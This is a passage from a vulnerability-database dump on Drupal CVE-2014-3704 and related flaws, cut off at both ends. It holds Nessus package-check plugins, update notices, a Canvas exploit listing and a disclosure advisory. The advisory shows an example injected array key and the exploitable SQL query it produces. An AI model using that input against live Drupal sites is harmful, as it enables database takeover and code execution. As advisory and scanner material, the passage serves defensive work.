value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1153402\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-October/141512.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?222d2be4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected drupal7 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal core 7.x SQL Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal HTTP Parameter Key/Value SQL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"drupal7-7.32-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal7\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:45:36", "description": "Updated drupal packages fix security vulnerabilities :\n\nAn information disclosure vulnerability was discovered in Drupal\nbefore 7.27. When pages are cached for anonymous users, form state may\nleak between anonymous users. Sensitive or private information\nrecorded for one anonymous user could thus be disclosed to other users\ninteracting with the same form at the same time (CVE-2014-2983).\n\nMultiple security issues in Drupal before 7.29, including a denial of\nservice issue, an access bypass issue in the File module, and multiple\ncross-site scripting issues (CVE-2014-5019, CVE-2014-5020,\nCVE-2014-5021, CVE-2014-5022).\n\nA denial of service issue exists in Drupal before 7.31, due to XML\nentity expansion in a publicly accessible XML-RPC endpoint.\n\nA SQL Injection issue exists in Drupal before 7.32 due to the way the\nDrupal core handles prepared statements. A malicious user can inject\narbitrary SQL queries, and thereby completely control the Drupal site.\nThis vulnerability can be exploited by remote attackers without any\nkind of authentication required (CVE-2014-3704).\n\nAaron Averill discovered that a specially crafted request can give a\nuser access to another user's session, allowing an attacker to hijack\na random session (CVE-2014-9015).\n\nMichael Cullum, Javier Nieto and Andres Rojas Guerrero discovered that\nthe password hashing API allows an attacker to send specially crafted\nrequests resulting in CPU and memory exhaustion. This may lead to the\nsite becoming unavailable or unresponsive (denial of service)\n(CVE-2014-9016). anonymous users (CVE-2014-9016).\n\nPassword reset URLs can be forged under certain circumstances,\nallowing an attacker to gain access to another user's account without\nknowing the account's password (CVE-2015-2559).\n\nUnder certain circumstances, malicious users can construct a URL that\nwill trick users into being redirected to a 3rd party website, thereby\nexposing the users to potential social engineering attacks. In\naddition, several URL-related API functions in Drupal 6 and 7 can be\ntricked into passing through external URLs when not intending to,\npotentially leading to additional open redirect vulnerabilities\n(CVE-2015-2749, CVE-2015-2750).\n\nThe drupal package has been updated to version 7.35 to fix this issue\nand other bugs. See the upstream advisory and release notes for more\ndetails.", "edition": 25, "published": "2015-03-31T00:00:00", "title": "Mandriva Linux Security Advisory : drupal (MDVSA-2015:181)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2750", "CVE-2014-9015", "CVE-2015-2749", "CVE-2014-5020", "CVE-2014-5021", "CVE-2014-2983", "CVE-2014-3704", "CVE-2014-5019", "CVE-2015-2559", "CVE-2014-5022", "CVE-2014-9016"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:drupal-sqlite", "p-cpe:/a:mandriva:linux:drupal-postgresql", "p-cpe:/a:mandriva:linux:drupal", "p-cpe:/a:mandriva:linux:drupal-mysql"], "id": "MANDRIVA_MDVSA-2015-181.NASL", "href": "https://www.tenable.com/plugins/nessus/82456", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2015:181. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82456);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/08/02 13:32:57\");\n\n script_cve_id(\"CVE-2014-2983\", \"CVE-2014-3704\", \"CVE-2014-5019\", \"CVE-2014-5020\", \"CVE-2014-5021\", \"CVE-2014-5022\", \"CVE-2014-9015\", \"CVE-2014-9016\", \"CVE-2015-2559\", \"CVE-2015-2749\", \"CVE-2015-2750\");\n script_xref(name:\"MDVSA\", value:\"2015:181\");\n\n script_name(english:\"Mandriva Linux Security Advisory : drupal (MDVSA-2015:181)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated drupal packages fix security vulnerabilities :\n\nAn information disclosure vulnerability was discovered in Drupal\nbefore 7.27. When pages are cached for anonymous users, form state may\nleak between anonymous users. Sensitive or private information\nrecorded for one anonymous user could thus be disclosed to other users\ninteracting with the same form at the same time (CVE-2014-2983).\n\nMultiple security issues in Drupal before 7.29, including a denial of\nservice issue, an access bypass issue in the File module, and multiple\ncross-site scripting issues (CVE-2014-5019, CVE-2014-5020,\nCVE-2014-5021, CVE-2014-5022).\n\nA denial of service issue exists in Drupal before 7.31, due to XML\nentity expansion in a publicly accessible XML-RPC endpoint.\n\nA SQL Injection issue exists in Drupal before 7.32 due to the way the\nDrupal core handles prepared statements. A malicious user can inject\narbitrary SQL queries, and thereby completely control the Drupal site.\nThis vulnerability can be exploited by remote attackers without any\nkind of authentication required (CVE-2014-3704).\n\nAaron Averill discovered that a specially crafted request can give a\nuser access to another user's session, allowing an attacker to hijack\na random session (CVE-2014-9015).\n\nMichael Cullum, Javier Nieto and Andres Rojas Guerrero discovered that\nthe password hashing API allows an attacker to send specially crafted\nrequests resulting in CPU and memory exhaustion. This may lead to the\nsite becoming unavailable or unresponsive (denial of service)\n(CVE-2014-9016). anonymous users (CVE-2014-9016).\n\nPassword reset URLs can be forged under certain circumstances,\nallowing an attacker to gain access to another user's account without\nknowing the account's password (CVE-2015-2559).\n\nUnder certain circumstances, malicious users can construct a URL that\nwill trick users into being redirected to a 3rd party website, thereby\nexposing the users to potential social engineering attacks. In\naddition, several URL-related API functions in Drupal 6 and 7 can be\ntricked into passing through external URLs when not intending to,\npotentially leading to additional open redirect vulnerabilities\n(CVE-2015-2749, CVE-2015-2750).\n\nThe drupal package has been updated to version 7.35 to fix this issue\nand other bugs. See the upstream advisory and release notes for more\ndetails.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0322.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0329.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0423.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0492.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2015-0121.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal core 7.x SQL Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal HTTP Parameter Key/Value SQL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:drupal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:drupal-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:drupal-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:drupal-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"drupal-7.35-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"drupal-mysql-7.35-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"drupal-postgresql-7.35-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"drupal-sqlite-7.35-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3704"], "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "modified": "2014-11-01T17:17:24", "published": "2014-11-01T17:17:24", "id": "FEDORA:B03376278634", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: drupal7-7.32-1.fc21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3704"], "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "modified": "2014-10-28T06:38:09", "published": "2014-10-28T06:38:09", "id": "FEDORA:65CE560DBDFB", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: drupal7-7.32-1.fc19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3407", "CVE-2014-3704"], "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "modified": "2014-10-28T06:48:09", "published": "2014-10-28T06:48:09", "id": "FEDORA:6AD3E60E5BD4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: drupal7-7.32-1.fc20", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "canvas": [{"lastseen": "2016-09-25T14:13:42", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3704"], "edition": 1, "description": "**Name**| drupal_name_sqli_callback \n---|--- \n**CVE**| CVE-2014-3704 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Drupal injection exploit \n**Notes**| CVE Name: CVE-2014-3704 \nVENDOR: drupal.org \nNotes: \n \nThis exploit tries to open a php callback to canvas by injecting php code \nin Drupal's login block through the database sql injection. \n \nRepeatability: Infinite \nReferences: https://www.drupal.org/SA-CORE-2014-005 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704 \n\n", "modified": "2014-10-15T20:55:06", "published": "2014-10-15T20:55:06", "id": "DRUPAL_NAME_SQLI_CALLBACK", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/drupal_name_sqli_callback", "type": "canvas", "title": "Immunity Canvas: DRUPAL_NAME_SQLI_CALLBACK", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-3704"], "description": "\r\n\r\n SektionEins GmbH\r\n www.sektioneins.de\r\n\r\n -= Security Advisory =-\r\n\r\nAdvisory: Drupal - pre-auth SQL Injection Vulnerability\r\nRelease Date: 2014/10/15\r\nLast Modified: 2014/10/15\r\nAuthor: Stefan Horst [stefan.horst[at]sektioneins.de]\r\nApplication: Drupal &gt;= 7.0 &lt;= 7.31\r\nSeverity: Full SQL injection, which results in total control and code execution of Website.\r\nRisk: Highly Critical\r\nVendor Status: Drupal 7.32 fixed this bug\r\nReference: http://www.sektioneins.com/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html\r\n\r\nOverview:\r\n Quote from http://www.drupal.org\r\n &quot;Come for the software, stay for the community\r\n Drupal is an open source content management platform powering millions\r\n of websites and applications. It\u2019s built, used, and supported by an\r\n active and diverse community of people around the world.&quot;\r\n\r\n During a code audit of Drupal extensions for a customer an SQL Injection\r\n was found in the way the Drupal core handles prepared statements.\r\n\r\n A malicious user can inject arbitrary SQL queries. And thereby\r\n control the complete Drupal site. This leads to a code execution as well.\r\n\r\n This vulnerability can be exploited by remote attackers without any\r\n kind of authentication required.\r\n\r\nDetails:\r\n Drupal uses prepared statements in all its SQL queries. To handle IN\r\n statements there is an expandArguments function to expand arrays.\r\n\r\n protected function expandArguments&#40;&amp;$query, &amp;$args&#41; {\r\n $modified = FALSE;\r\n\r\n // If the placeholder value to insert is an array, assume that we need\r\n // to expand it out into a comma-delimited set of placeholders.\r\n foreach &#40;array_filter&#40;$args, &#39;is_array&#39;&#41; as $key =&gt; $data&#41; {\r\n $new_keys = array&#40;&#41;;\r\n foreach &#40;$data as $i =&gt; $value&#41; {\r\n // This assumes that there are no other placeholders that use the same\r\n // name. For example, if the array placeholder is defined as :example\r\n // and there is already an :example_2 placeholder, this will generate\r\n // a duplicate key. We do not account for that as the calling code\r\n // is already broken if that happens.\r\n $new_keys[$key . &#39;_&#39; . $i] = $value;\r\n }\r\n\r\n // Update the query with the new placeholders.\r\n // preg_replace is necessary to ensure the replacement does not affect\r\n // placeholders that start with the same exact text. For example, if the\r\n // query contains the placeholders :foo and :foobar, and :foo has an\r\n // array of values, using str_replace would affect both placeholders,\r\n // but using the following preg_replace would only affect :foo because\r\n // it is followed by a non-word character.\r\n $query = preg_replace&#40;&#39;#&#39; . $key . &#39;&#92;b#&#39;, implode&#40;&#39;, &#39;, array_keys&#40;$new_keys&#41;&#41;, $query&#41;;\r\n\r\n // Update the args array with the new placeholders.\r\n unset&#40;$args[$key]&#41;;\r\n $args += $new_keys;\r\n\r\n $modified = TRUE;\r\n }\r\n\r\n return $modified;\r\n }\r\n\r\n The function assumes that it is called with an array which has no keys. Example:\r\n\r\n db_query&#40;&quot;SELECT * FROM {users} where name IN &#40;:name&#41;&quot;, array&#40;&#39;:name&#39;=&gt;array&#40;&#39;user1&#39;,&#39;user2&#39;&#41;&#41;&#41;;\r\n\r\n Which results in this SQL Statement\r\n\r\n SELECT * from users where name IN &#40;:name_0, :name_1&#41;\r\n\r\n with the parameters name_0 = user1 and name_1 = user2.\r\n\r\n The Problem occurs, if the array has keys, which are no integers. Example:\r\n\r\n db_query&#40;&quot;SELECT * FROM {users} where name IN &#40;:name&#41;&quot;, array&#40;&#39;:name&#39;=&gt;array&#40;&#39;test -- &#39; =&gt; &#39;user1&#39;,&#39;test&#39; =&gt; &#39;user2&#39;&#41;&#41;&#41;;\r\n\r\n this results in an exploitable SQL query:\r\n\r\n SELECT * FROM users WHERE name = :name_test -- , :name_test AND status = 1\r\n\r\n with parameters :name_test = user2.\r\n\r\n Since Drupal uses PDO, multi-queries are allowed. So this SQL Injection can\r\n be used to insert arbitrary data in the database, dump or modify existing data\r\n or drop the whole database.\r\n\r\n With the possibility to INSERT arbitrary data into the database an\r\n attacker can execute any PHP code through Drupal features with callbacks.\r\n\r\nPatch:\r\n\r\n $new_keys = array&#40;&#41;;\r\n foreach &#40;array_values&#40;$data&#41; as $i =&gt; $value&#41; {\r\n // This assumes that there are no other placeholders that use the same\r\n // name. For example, if the array placeholder is defined as :example\r\n // and there is already an :example_2 placeholder, this will generate\r\n // a duplicate key. We do not account for that as the calling code\r\n // is already broken if that happens.\r\n $new_keys[$key . &#39;_&#39; . $i] = $value;\r\n }\r\n\r\nProof of Concept:\r\n\r\n SektionEins GmbH has developed a proof of concept, but was asked by\r\n Drupal to postpone the release.\r\n\r\nDisclosure Timeline:\r\n\r\n 16. Sep. 2014 - Notified the Drupal devs via security contact form\r\n 15. Okt. 2014 - Relase of Bugfix by Drupal core Developers\r\n\r\nRecommendation:\r\n\r\n It is recommended to upgrade to the latest version of Drupal.\r\n\r\n Grab your copy at:\r\n https://www.drupal.org/project/drupal\r\n\r\nCVE Information:\r\n\r\n The Common Vulnerabilities and Exposures project &#40;cve.mitre.org&#41; has\r\n assigned the name CVE-2014-3704 to this vulnerability.\r\n\r\nGPG-Key:\r\n\r\n pub 2048D/7830F25D 2014-08-12 Stefan Horst\r\n Key fingerprint = 380D 2FEE 62E6 83AE 6A5C 7267 6AE5 40BE 7830 F25D\r\n\r\nCopyright 2014 SektionEins GmbH. All rights reserved.\r\n\r\n\r\n", "edition": 1, "modified": "2014-10-17T00:00:00", "published": "2014-10-17T00:00:00", "id": "SECURITYVULNS:DOC:31296", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31296", "title": "Advisory 01/2014: Drupal7 - pre Auth SQL Injection Vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:59", "bulletinFamily": "software", "cvelist": ["CVE-2015-2750", "CVE-2014-9015", "CVE-2015-2749", "CVE-2014-5020", "CVE-2014-5021", "CVE-2014-2983", "CVE-2014-3704", "CVE-2014-5019", "CVE-2015-2559", "CVE-2014-5022", "CVE-2014-9016"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2015:181\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : drupal\r\n Date : March 30, 2015\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Updated drupal packages fix security vulnerabilities:\r\n \r\n An information disclosure vulnerability was discovered in Drupal\r\n before 7.27. When pages are cached for anonymous users, form state\r\n may leak between anonymous users. Sensitive or private information\r\n recorded for one anonymous user could thus be disclosed to other\r\n users interacting with the same form at the same time &#40;CVE-2014-2983&#41;.\r\n \r\n Multiple security issues in Drupal before 7.29, including a denial\r\n of service issue, an access bypass issue in the File module, and\r\n multiple cross-site scripting issues &#40;CVE-2014-5019, CVE-2014-5020,\r\n CVE-2014-5021, CVE-2014-5022&#41;.\r\n \r\n A denial of service issue exists in Drupal before 7.31, due to XML\r\n entity expansion in a publicly accessible XML-RPC endpoint.\r\n \r\n An SQL Injection issue exists in Drupal before 7.32 due to the way\r\n the Drupal core handles prepared statements. A malicious user can\r\n inject arbitrary SQL queries, and thereby completely control the\r\n Drupal site. This vulnerability can be exploited by remote attackers\r\n without any kind of authentication required &#40;CVE-2014-3704&#41;.\r\n \r\n Aaron Averill discovered that a specially crafted request can give a\r\n user access to another user&#039;s session, allowing an attacker to hijack\r\n a random session &#40;CVE-2014-9015&#41;.\r\n \r\n Michael Cullum, Javier Nieto and Andres Rojas Guerrero discovered\r\n that the password hashing API allows an attacker to send specially\r\n crafted requests resulting in CPU and memory exhaustion. This may lead\r\n to the site becoming unavailable or unresponsive &#40;denial of service&#41;\r\n &#40;CVE-2014-9016&#41;. anonymous users &#40;CVE-2014-9016&#41;.\r\n \r\n Password reset URLs can be forged under certain circumstances, allowing\r\n an attacker to gain access to another user&#039;s account without knowing\r\n the account&#039;s password &#40;CVE-2015-2559&#41;.\r\n \r\n Under certain circumstances, malicious users can construct a URL\r\n that will trick users into being redirected to a 3rd party website,\r\n thereby exposing the users to potential social engineering attacks. In\r\n addition, several URL-related API functions in Drupal 6 and 7 can be\r\n tricked into passing through external URLs when not intending to,\r\n potentially leading to additional open redirect vulnerabilities\r\n &#40;CVE-2015-2749, CVE-2015-2750&#41;.\r\n \r\n The drupal package has been updated to version 7.35 to fix this\r\n issue and other bugs. See the upstream advisory and release notes\r\n for more details.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2983\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5019\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5020\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5021\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5022\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9015\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9016\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2559\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2749\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2750\r\n http://advisories.mageia.org/MGASA-2014-0322.html\r\n http://advisories.mageia.org/MGASA-2014-0329.html\r\n http://advisories.mageia.org/MGASA-2014-0423.html\r\n http://advisories.mageia.org/MGASA-2014-0492.html\r\n http://advisories.mageia.org/MGASA-2015-0121.html\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n 8181a2b7b02a918304059853aa485f98 mbs1/x86_64/drupal-7.35-1.mbs1.noarch.rpm\r\n 68e0c245147c7044c5ea3c55a0d3951a mbs1/x86_64/drupal-mysql-7.35-1.mbs1.noarch.rpm\r\n bde1b563b01f56120c032086167239a4 mbs1/x86_64/drupal-postgresql-7.35-1.mbs1.noarch.rpm\r\n 2e9f67e53b0472ae175b9853a05c7af2 mbs1/x86_64/drupal-sqlite-7.35-1.mbs1.noarch.rpm \r\n f9519474702357f27e4bb03557064d9d mbs1/SRPMS/drupal-7.35-1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_&#40;at&#41;_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n &lt;security*mandriva.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFVGTXBmqjQ0CJFipgRAuMOAJ9CQl8dyrZJuFJWL9Y/MI9x3IcHtQCfc/s3\r\n7fYwyk+8ldbJhjqKI46bLHk=\r\n=3jEr\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2015-05-12T00:00:00", "published": "2015-05-12T00:00:00", "id": "SECURITYVULNS:DOC:32107", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32107", "title": "[ MDVSA-2015:181 ] drupal", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:57", "bulletinFamily": "software", "cvelist": ["CVE-2014-7181", "CVE-2014-7182", "CVE-2014-3863", "CVE-2014-3149", "CVE-2014-3418", "CVE-2014-3503", "CVE-2014-3482", "CVE-2014-3483", "CVE-2014-3704", "CVE-2014-3419", "CVE-2014-4326", "CVE-2014-4331", "CVE-2014-3990"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2014-10-17T00:00:00", "published": "2014-10-17T00:00:00", "id": "SECURITYVULNS:VULN:14032", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14032", "title": "Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:00", "bulletinFamily": "software", "cvelist": ["CVE-2015-2750", "CVE-2015-2172", "CVE-2015-0225", "CVE-2014-9258", "CVE-2015-2843", "CVE-2015-0845", "CVE-2015-2845", "CVE-2014-2027", "CVE-2014-8764", "CVE-2015-2844", "CVE-2014-8360", "CVE-2014-2685", "CVE-2014-5361", "CVE-2014-8762", "CVE-2015-2206", "CVE-2015-2934", "CVE-2014-8761", "CVE-2015-2938", "CVE-2015-2749", "CVE-2014-8763", "CVE-2015-2933", "CVE-2014-5020", "CVE-2015-2939", "CVE-2014-2682", "CVE-2014-5021", "CVE-2015-2940", 